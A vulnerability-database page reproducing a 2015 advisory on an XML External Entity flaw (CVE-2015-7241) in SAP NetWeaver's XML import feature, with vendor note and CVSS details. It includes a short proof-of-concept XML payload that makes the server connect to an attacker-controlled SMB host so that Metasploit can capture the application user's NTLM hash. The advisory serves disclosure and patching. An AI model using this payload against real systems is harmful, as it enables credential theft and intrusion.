Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

SAP NetWeaver < 7.01 - XML External Entity Injection

🗓️ 22 Sep 2015 00:00:00Reported by Lukasz MiedzinskiType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 33 Views

SAP NetWeaver XML Entity Injection CVE-2015-724

Related
Code
ReporterTitlePublishedViews
Family
CNVD		SAP Netwaver XML External Entity Injection Vulnerability
29 Oct 201500:00
cnvd
CVE		CVE-2015-7241
6 Sep 201721:00
cve
Cvelist		CVE-2015-7241
6 Sep 201721:00
cvelist
exploitpack		SAP NetWeaver 7.01 - XML External Entity Injection
22 Sep 201500:00
exploitpack
NVD		CVE-2015-7241
6 Sep 201721:29
nvd
Packet Storm		SAP Netweaver XML External Entity Injection
21 Sep 201500:00
packetstorm
Prion		Xxe
6 Sep 201721:29
prion
securityvulns		SAP Netwaver - XML External Entity Injection
25 Oct 201500:00
securityvulns
securityvulns		SAP NetWeaver security vulnerabilities
25 Oct 201500:00
securityvulns
Title: SAP Netwaver - XML External Entity Injection
Author: Lukasz Miedzinski
GPG: Public key provided in attachment
Date: 29/10/2014
CVE: CVE-2015-7241

Affected software :
===================

SAP Netwear : <7.01

Vendor advisories (only for customers):
===================
External ID : 851975 2014
Title:  XML External Entity vulnerability in SAP XML Parser
Security Note: 2098608
Advisory Plan Date: 12/5/2014
Delivery date of fix/Patch Day: 10/2/2014
CVSS Base Score: 5.5
CVSS Base Vector: AV:N/AC:L/AU:S/C:P/I:N/A:P


Description :
=============
XML External Entity Injection vulnerability has been found in the XML
parser in the System

Administration->XML Content and Actions -> Import section.


Vulnerabilities :
*****************

XML External Entity Injection :
======================


Example show how pentester is able to get NTLM hash of application's user.

Content of file (PoC) :

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "file:////Tester.IP/test"> %remote; %param1; ]>
<root/>

When pentester has metasploit smb_capture module run, then application
will contatc him and provide

NTLM hash of user.


Contact :
=========

Lukasz[dot]Miedzinski[at]gmail[dot]com

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Sep 2015 00:00Current
9.7High risk
Vulners AI Score9.7
CVSS 27.5
CVSS 39.8
EPSS0.27377
sap netweaverxml injectionvulnerabilitycve-2015-7241
33